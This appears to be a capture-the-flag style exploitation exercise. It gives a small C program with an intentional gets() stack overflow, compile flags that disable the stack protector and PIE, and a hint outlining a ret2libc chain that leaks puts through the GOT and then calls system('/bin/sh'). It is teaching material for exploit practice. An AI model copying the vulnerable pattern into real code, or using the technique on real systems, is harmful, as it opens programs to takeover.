Goal: All mitigations on except canary. Two-stage exploit: leak libc via puts(puts@got), then ret2system.
// chal05.c
#include <stdio.h>
void v(){char b[128];gets(b);}
int main(){while(1)v();return 0;}
gcc -fno-stack-protector -no-pie -o chal05 chal05.c
# ASLR ON for this one (default):
echo 2 | sudo tee /proc/sys/kernel/randomize_va_spaceHint: Stage 1 chain: pop rdi → puts@got → puts@plt → main. Read 8 bytes back, subtract libc.symbols['puts'] for libc base. Stage 2: ROP to system("/bin/sh").